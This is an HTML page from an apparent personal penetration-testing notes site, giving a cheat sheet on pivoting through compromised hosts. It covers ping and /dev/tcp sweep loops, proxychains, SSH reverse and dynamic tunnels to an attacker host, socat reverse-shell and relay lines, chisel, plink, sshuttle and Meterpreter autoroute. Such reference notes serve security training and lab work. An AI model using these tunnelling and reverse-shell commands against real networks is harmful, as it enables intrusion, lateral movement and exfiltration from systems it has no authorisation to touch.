2022-09-02 09:05:59 +02:00
<!doctype html>
< html lang = "en" >
< center >
< head >
< script src = "https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js" > < / script >
2022-09-09 15:41:05 +02:00
< script src = "https://code.jquery.com/jquery-3.5.1.min.js" > < / script >
< script type = "text/javascript" src = "/static/js/auto-complete.js" > < / script >
< script type = "text/javascript" src = "/static/js/lunr.min.js" > < / script >
< script type = "text/javascript" src = "/static/js/search.js" > < / script >
2022-09-02 09:05:59 +02:00
< link rel = "stylesheet" href = "/static/stylesheet.css" >
< link rel = "stylesheet" href = "/static/auto-complete.css" >
< br >
2022-09-09 15:41:05 +02:00
< title > The Real Hugo< / title >
2022-09-02 09:05:59 +02:00
< meta name = "viewport" content = "width=device-width, initial-scale=1" >
< / head >
< body >
<!-- topmenu -->
< div class = "menu" >
2022-09-09 15:41:05 +02:00
< a href = "/" style = "text-decoration:none" > Husk< / a >
2022-09-02 09:05:59 +02:00
< / div >
< div class = "search-container" >
< label for = "search-by" > < i class = "fas fa-search" > < / i > < / label >
< input data-search-input = "" id = "search-by" type = "search" placeholder = "Search..." autocomplete = "off" >
<!-- button type="submit"><i class="search"></i>🔍</button> -->
< span data-search-clear = "" > < i class = "fas fa-times" > < / i > < / span >
< / div >
< / div >
< div class = "menu" >
< / div >
<!-- br><br -->
< / center >
< p > < / p >
< div class = "columns" >
<!-- Sidebar -->
< div class = "column column-1" >
2022-09-09 15:41:05 +02:00
< ul > < details id = enumeration ontoggle = "linkClick(this); return false;" > < summary > Enumeration< / summary > < ul > < details id = containers ontoggle = "linkClick(this); return false;" > < summary > Containers< / summary > < ul > < / ul > < / details > < details id = docs ontoggle = "linkClick(this); return false;" > < summary > Docs< / summary > < ul > < li > < a href = "/enumeration/docs/aws.html" > aws< / a > < / li > < li > < a href = "/enumeration/docs/cewl.html" > cewl< / a > < / li > < li > < a href = "/enumeration/docs/dns.html" > dns< / a > < / li > < li > < a href = "/enumeration/docs/docker_enumeration.html" > docker_enumeration< / a > < / li > < li > < a href = "/enumeration/docs/ffuf.html" > ffuf< / a > < / li > < li > < a href = "/enumeration/docs/gobuster.html" > gobuster< / a > < / li > < li > < a href = "/enumeration/docs/kerberoast.html" > kerberoast< / a > < / li > < li > < a href = "/enumeration/docs/kubectl.html" > kubectl< / a > < / li > < li > < a href = "/enumeration/docs/ldap.html" > ldap< / a > < / li > < li > < a href = "/enumeration/docs/linux_basics.html" > linux_basics< / a > < / li > < li > < a href = "/enumeration/docs/microk8s.html" > microk8s< / a > < / li > < li > < a href = "/enumeration/docs/nfs.html" > nfs< / a > < / li > < li > < a href = "/enumeration/docs/nikto.html" > nikto< / a > < / li > < li > < a href = "/enumeration/docs/nmap.html" > nmap< / a > < / li > < li > < a href = "/enumeration/docs/port_knocking.html" > port_knocking< / a > < / li > < li > < a href = "/enumeration/docs/rpcclient.html" > rpcclient< / a > < / li > < li > < a href = "/enumeration/docs/rsync.html" > rsync< / a > < / li > < li > < a href = "/enumeration/docs/rustscan.html" > rustscan< / a > < / li > < li > < a href = "/enumeration/docs/shodan.html" > shodan< / a > < / li > < details id = snmp ontoggle = "linkClick(this); return false;" > < summary > Snmp< / summary > < ul > < li > < a href = "/enumeration/docs/snmp/onesixtyone.html" > onesixtyone< / a > < / li > < li > < a href = "/enumeration/docs/snmp/snmpcheck.html" > snmpcheck< / a > < / li > < / ul > < / details > < li > < a href = "/enumeration/docs/websites.html" > websites< / a > < / li > < li > < a href = "/enumeration/docs/wfuzz.html" > wfuzz< / a > < / li > < li > < a href = "/enumeration/docs/wpscan.html" > wpscan< / a > < / li > < / ul > < / details > < details id = network_scanners ontoggle = "linkClick(this); return false;" > < summary > Network_scanners< / summary > < ul > < / ul > < / details > < details id = windows ontoggle = "linkClick(this); return false;" > < summary > Windows< / summary > < ul > < li > < a href = "/enumeration/windows/bloodhound.html" > bloodhound< / a > < / li > < li > < a href = "/enumeration/windows/event_log.html" > event_log< / a > < / li > < li > < a href = "/enumeration/windows/manual_enum.html" > manual_enum< / a > < / li > < li > < a href = "/enumeration/windows/powershell.html" > powershell< / a > < / li > < li > < a href = "/enumeration/windows/rpcclient.html" > rpcclient< / a > < / li > < li > < a href = "/enumeration/windows/sysinternals.html" > sysinternals< / a > < / li > < li > < a href = "/enumeration/windows/sysmon.html" > sysmon< / a > < / li > < li > < a href = "/enumeration/windows/vss.html" > vss< / a > < / li > < / ul > < / details > < / ul > < / details > < details id = exploit ontoggle = "linkClick(this); return false;" > < summary > Exploit< / summary > < ul > < details id = CPUs ontoggle = "linkClick(this); return false;" > < summary > CPUs< / summary > < ul > < li > < a href = "/exploit/CPUs/meltdown.html" > meltdown< / a > < / li > < / ul > < / details > < details id = binaries ontoggle = "linkClick(this); return false;" > < summary > Binaries< / summary > < ul > < li > < a href = "/exploit/binaries/Shellcode.html" > Shellcode< / a > < / li > < li > < a href = "/exploit/binaries/aslr.html" > aslr< / a > < / li > < details id = buffer_overflow ontoggle = "linkClick(this); return false;" > < summary > Buffer_overflow< / summary > < ul > < details id = docs ontoggle = "linkClick(this); return false;" > < summary > Docs< / summary > < ul > < li > < a href = "/exploit/binaries/buffer_overflow/docs/amd64.html" > amd64< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/amd64_instructions.html" > amd64_instructions< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/buffer_overflow.html" > buffer_overflow< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html" > cut_stack_in_half< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html" > pwntools_specifics< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html" > ret_address_reuse< / a > < / li > < / ul > < / details > < li > < a href = "/exploit/binaries/buffer_overflow/ropping.html" > ropping< / a > < / li > < / ul > < / details > < details id = canary_bypass ontoggle = "l
2022-09-02 09:05:59 +02:00
< / ul >
< / div >
< div class = "column column-2" >
< span class = "body" >
< style > p r e { l i n e - h e i g h t : 1 2 5 % ; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */< / style >
< div class = "column column-3" >
< ul >
< li > < a href = "#pivoting" > Pivoting< / a > < ul >
< li > < a href = "#enumeration" > Enumeration< / a > < ul >
< li > < a href = "#using-material-found-on-the-machine-and-preinstalled-tools" > Using material found on the machine and preinstalled tools< / a > < / li >
< li > < a href = "#scripting-techniques" > Scripting Techniques< / a > < / li >
< / ul >
< / li >
< li > < a href = "#tools" > Tools< / a > < ul >
< li > < a href = "#proxychains-foxyproxy" > Proxychains / FoxyProxy< / a > < / li >
< / ul >
< / li >
< / ul >
< / li >
< li > < a href = "#add-proxy-here" > add proxy here ...< / a > < / li >
< li > < a href = "#meanwhile" > meanwhile< / a > < / li >
< li > < a href = "#defaults-set-to-tor" > defaults set to "tor"< / a > < / li >
< li > < a href = "#socks5-127001-1337" > socks5 127.0.0.1 1337< / a > < / li >
< li > < a href = "#proxy_dns" > proxy_dns< / a > < ul >
< li > < a href = "#ssh-port-forwarding-and-tunnelling-primarily-unix" > SSH port forwarding and tunnelling (primarily Unix)< / a > < / li >
< li > < a href = "#plinkexe-windows" > plink.exe (Windows)< / a > < / li >
< li > < a href = "#socat" > Socat< / a > < / li >
< li > < a href = "#chisel" > Chisel< / a > < / li >
< li > < a href = "#sshuttle" > sshuttle< / a > < / li >
< li > < a href = "#meterpreter" > Meterpreter< / a > < ul >
< li > < a href = "#meterpreter-auto-routing" > Meterpreter Auto Routing< / a > < / li >
< li > < a href = "#meterpreter-proxy-routing" > Meterpreter Proxy Routing< / a > < / li >
< / ul >
< / li >
< li > < a href = "#rpivot" > rpivot< / a > < / li >
< li > < a href = "#links" > Links< / a > < / li >
< / ul >
< / li >
< / ul >
< / div >
< h1 id = "pivoting" > Pivoting< / h1 >
< ul >
< li > Tunnelling/Proxying< / li >
< li > Port Forwarding< / li >
< / ul >
< h2 id = "enumeration" > Enumeration< / h2 >
< h3 id = "using-material-found-on-the-machine-and-preinstalled-tools" > Using material found on the machine and preinstalled tools< / h3 >
< ul >
< li > < code > arp -a< / code > < / li >
< li > < code > /etc/hosts< / code > or < code > C:\Windows\System32\drivers\etc\hosts< / code > < / li >
< li > < code > /etc/resolv.conf< / code > < / li >
< li > < code > ipconfig /all< / code > < / li >
< li > < code > nmcli dev show< / code > < / li >
< li > < a href = "https://github.com/andrew-d/static-binaries.git" > Statically compiled tools< / a > < / li >
< / ul >
< h3 id = "scripting-techniques" > Scripting Techniques< / h3 >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "k" > for< / span > i < span class = "k" > in< / span > < span class = "o" > {< / span > < span class = "m" > 1< / span > ..255< span class = "o" > }< / span > < span class = "p" > ;< / span > < span class = "k" > do< / span > < span class = "o" > (< / span > ping -c < span class = "m" > 1< / span > < span class = "m" > 192< / span > .168.0.< span class = "si" > ${< / span > < span class = "nv" > 1< / span > < span class = "si" > }< / span > < span class = "p" > |< / span > grep < span class = "s2" > " bytes from" < / span > < span class = "p" > & < / span > < span class = "o" > )< / span > < span class = "p" > ;< / span > < span class = "k" > done< / span >
< span class = "k" > for< / span > i < span class = "k" > in< / span > < span class = "o" > {< / span > < span class = "m" > 1< / span > ..65535< span class = "o" > }< / span > < span class = "p" > ;< / span > < span class = "k" > do< / span > < span class = "o" > (< / span > < span class = "nb" > echo< / span > > /dev/tcp/192.168.0.1/< span class = "nv" > $i< / span > < span class = "o" > )< / span > > /dev/null < span class = "m" > 2< / span > > < span class = "p" > & < / span > < span class = "m" > 1< / span > < span class = "o" > & & < / span > < span class = "nb" > echo< / span > < span class = "nv" > $i< / span > is open< span class = "p" > ;< / span > < span class = "k" > done< / span >
< / code > < / pre > < / div >
< ul >
< li > Using local tools through a proxy like < code > nmap< / code > < / li >
< / ul >
< h2 id = "tools" > Tools< / h2 >
< ul >
< li > Enumerating a network using native and statically compiled tools< / li >
< / ul >
< h3 id = "proxychains-foxyproxy" > Proxychains / FoxyProxy< / h3 >
< ul >
< li > In need of dynamic port forwarding execute a reverse proxy on the jumpserver to reach the attacker's proxychains
< code > sh
ssh < username> @$ATTACKER_IP -R 9050 -N< / code > < / li >
< li > Proxychains, e.g. scan target via nmap, or connect via nc through jump server
< code > sh
proxychains nc < IP> < PORT>
proychains nmap < IP>
proxychains ssh user@$TARGET_IP
proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS
proxychains wget http://$TARGET_IP:8000/loot.zip< / code > < ul >
< li > Use < code > /etc/proxychains.conf< / code > or < code > ./proxychains.conf< / code > containing:
```sh
[ProxyList]< / li >
< / ul >
< h1 id = "add-proxy-here" > add proxy here ...< / h1 >
< h1 id = "meanwhile" > meanwhile< / h1 >
< h1 id = "defaults-set-to-tor" > defaults set to "tor"< / h1 >
< p > socks4 127.0.0.1 9050< / p >
< h1 id = "socks5-127001-1337" > socks5 127.0.0.1 1337< / h1 >
< h1 id = "proxy_dns" > proxy_dns< / h1 >
< p > ``` < / p >
< / li >
< li > FoxyProxy, choose proxy type, proxy IP and port in settings < / li >
< / ul >
< h3 id = "ssh-port-forwarding-and-tunnelling-primarily-unix" > SSH port forwarding and tunnelling (primarily Unix)< / h3 >
< ul >
< li >
< p > LocalPortForwarding
< code > sh
ssh -L $LOCAL_PORT:< IP_seen_from_Jumpserver> :< Port_seen_from_Jumpserver> < user> @< Jumpserver> -fN< / code > < / p >
< ul >
< li > Another possibility to use the jumpserver directly on it's cli via < code > ssh < username> @< jumpserver> -L *:$LOCAL_PORT:127.0.0.1:80 -N< / code > . One can connect now to the target via the jumpserver< / li >
< li > Tip: open port on windows target via
< code > sh
netsh advfirewall firewall add rule name="new port" dir=in action=allow protocol=TCP localport=%PORT%< / code > < / li >
< / ul >
< / li >
< li >
< p > Dynamic Port Forwarding
< code > sh
ssh -D $PORT < user> @< Jumpserver> -fN< / code > < / p >
< / li >
< li >
< p > Reverse Proxy, if there is an SSH client on the jumpserver but no SSH server via
< code > sh
ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT USERNAME@$ATTACKER_IP(local) -i $KEYFILE -fN< / code > < / p >
< ul >
< li > Tip1: create a user on the attacker to receive the connection without compromising your own password< / li >
< li > Tip2: use < code > -N< / code > to not receive an interactive shell. The attacking user does not necessarily have one on the target< / li >
< / ul >
< / li >
< / ul >
< h3 id = "plinkexe-windows" > plink.exe (Windows)< / h3 >
< ul >
< li > < a href = "https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html" > latest version< / a > < / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > cmd.exe /c < span class = "nb" > echo< / span > y < span class = "p" > |< / span > .< span class = "se" > \p< / span > link.exe -R < LocalPort> :< TargetIP> :< TargetPort> < user> @< Jumpserver> -i < key> -N
< / code > < / pre > < / div >
< ul >
< li > Key generation
< code > sh
puttygen < keyfile> -o key.ppk< / code > < / li >
< li > Circumvention, described by < a href = "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d" > U.Y.< / a > < / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "nb" > echo< / span > y < span class = "p" > |< / span > < span class = "p" > & < / span > .< span class = "se" > \p< / span > link.exe -ssh -l < MYUSERNAME> -pw < MYPASSWORD> -R < MYIP> :< MYPORT> :127.0.0.1:< TARGETPORT> < MYIP>
< / code > < / pre > < / div >
< h3 id = "socat" > Socat< / h3 >
< ul >
< li >
< p > Reverse shell on target via
< code > sh
./socat tcp-l:8000 tcp:< attacker-IP> :443 & < / code > < / p >
< ul >
< li > Attacking bind shell
< code > sh
sudo nc -lvnp 443< / code > < / li >
< / ul >
< / li >
< li >
< p > Relay on jumpserver via
< code > sh
./socat tcp-l:33060,fork,reuseaddr tcp:< TargetIP> :3306 & < / code > < / p >
< / li >
< li >
< p > Quiet Port Forwarding< / p >
< ul >
< li > On attacker
< code > sh
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr & < / code > < / li >
< li > On relay server
< code > sh
./socat tcp:< attacker-IP> :8001 tcp:< TargetIP> :< TargetPort> ,fork & < / code > < / li >
< li > Open < code > localhost:8000< / code > < / li >
< / ul >
< / li >
< li >
< p > Processes are backgrounded via < code > & < / code > . Therefore, the process can be quit by using the corresponding bg number like < code > kill %1< / code > .< / p >
< / li >
< li >
< p > In need of a Download on target, expose a port on the attacker via relay
< code > sh
socat tcp-l:80,fork tcp:$ATTACKER_IP:80< / code > < / p >
< / li >
< / ul >
< h3 id = "chisel" > Chisel< / h3 >
< ul >
< li > < strong > Does not require SSH on target< / strong > < / li >
< li >
< p > Reverse Proxy< / p >
< ul >
< li > Bind port on attacker
< code > sh
./chisel server -p < ListeningPort> --reverse & < / code > < / li >
< li > Reverse port on target/proxy
< code > sh
./chisel client < attacker-IP> :< attacker-Port> R:socks & < / code > < / li >
< li > < code > proxychains.conf< / code > contains
< code > sh
[ProxyList]
socks5 127.0.0.1 < Listening-Port> < / code > < / li >
< / ul >
< / li >
< li >
< p > Forward SOCKS Proxy< / p >
< ul >
< li > Proxy/compromised machine
< code > sh
./chisel server -p < Listen-Port> --socks5< / code > < / li >
< li > On attacker
< code > sh
./chisel client < target-IP> :< target-Port> < proxy-Port> :socks< / code > < / li >
< / ul >
< / li >
< li > Remote Port Forward< ul >
< li > On attacker
< code > sh
./chisel server -p < Listen-Port> --reverse & < / code > < / li >
< li > On forwarder
< code > sh
./chisel client < attacker-IP> :< attackerListen-Port> R:< Forwarder-Port> :< target-IP> :< target-Port> & < / code > < / li >
< / ul >
< / li >
< li > Local Port Forwarding< ul >
< li > On proxy
< code > sh
./chisel server -p < Listen-Port> < / code > < / li >
< li > On attacker
< code > sh
./chisel client < Listen-IP> :< Listen-Port> < attacker-IP> :< target-IP> :< target-Port> < / code > < / li >
< / ul >
< / li >
< / ul >
< h3 id = "sshuttle" > sshuttle< / h3 >
< ul >
< li > < code > pip install sshuttle< / code > < / li >
< li > < code > sshuttle -r < user> @< target> < subnet/CIDR> < / code > < / li >
< li > or automatically determined< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > sshuttle -r < user> @< target> -N
< / code > < / pre > < / div >
< ul >
< li > Key based auth< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > sshuttle -r < user> @< target> --ssh-cmd < span class = "s2" > " ssh -i < key> " < / span > < subnet/CIDR>
< / code > < / pre > < / div >
< ul >
< li > Exclude servers via < code > -x< / code > , for example the target/gateway server< / li >
< / ul >
< h3 id = "meterpreter" > Meterpreter< / h3 >
< ul >
< li > Meterpreter with payload < code > set payload linux/x64/meterpreter_reverse_tcp< / code > after successful connection do< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > portfwd add -l < span class = "m" > 22< / span > -p < span class = "m" > 22< / span > -r < span class = "m" > 127< / span > .0.0.1
< / code > < / pre > < / div >
< h4 id = "meterpreter-auto-routing" > Meterpreter Auto Routing< / h4 >
< ul >
< li > Upload payload and catch it with < code > multi/handler< / code > < / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > background
use post/multi/manage/autoroute
set session 1
set subnet < 10.0.0.0>
run
< / code > < / pre > < / div >
< h4 id = "meterpreter-proxy-routing" > Meterpreter Proxy Routing< / h4 >
< ul >
< li > Specify socks proxy via< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > use auxiliary/server/socks_proxy
< / code > < / pre > < / div >
< ul >
< li > Set proxychain on attacker accordingly< / li >
< / ul >
< h3 id = "rpivot" > rpivot< / h3 >
< ul >
< li > < a href = "https://github.com/klsecservices/rpivot.git" > klsecservices' repo< / a > < / li >
< li > < a href = "https://github.com/klsecservices/rpivot/releases/tag/v1.0" > Their windows binary release< / a > < / li >
< / ul >
< h2 id = "links" > Links< / h2 >
< ul >
< li > < a href = "https://adepts.of0x.cc/shadowmove-hijack-socket/" > Shadowmove at the adepts of 0xcc< / a > < / li >
< / ul >
< / span >
< / div >
< / div >
< div id = "footer" >
< p > < / p >
< center >
© Stefan Friese
< / center >
< / div >
< script >
2022-09-09 15:41:05 +02:00
function linkClick(obj) {
2022-09-02 09:05:59 +02:00
if (obj.open) {
2022-09-09 15:41:05 +02:00
//console.log('open');
2022-09-02 09:05:59 +02:00
if (sessionStorage.getItem(obj.id) & & !(sessionStorage.getItem(obj.id) === "open")) {
sessionStorage.removeItem(obj.id);
}
2022-09-09 15:41:05 +02:00
sessionStorage.setItem(obj.id,"open");
console.log(obj.id);
2022-09-02 09:05:59 +02:00
} else {
2022-09-09 15:41:05 +02:00
//console.log('closed');
sessionStorage.removeItem(obj.id);
}
}
2022-09-02 09:05:59 +02:00
2022-09-09 15:41:05 +02:00
let _keys = Object.keys(sessionStorage);
if (_keys) {
for ( let i = 0; i < _keys.length ; i + + ) {
document.getElementById(_keys[i])['open'] = 'open';
}
}
2022-09-02 09:05:59 +02:00
< / script >
2022-09-09 15:41:05 +02:00
< script async src = "https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type = "text/javascript" > < / script >
2022-09-02 09:05:59 +02:00
< script type = "text/x-mathjax-config" >
2022-09-09 15:41:05 +02:00
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
< / script >
2022-09-02 09:05:59 +02:00
< / body >
< / html >
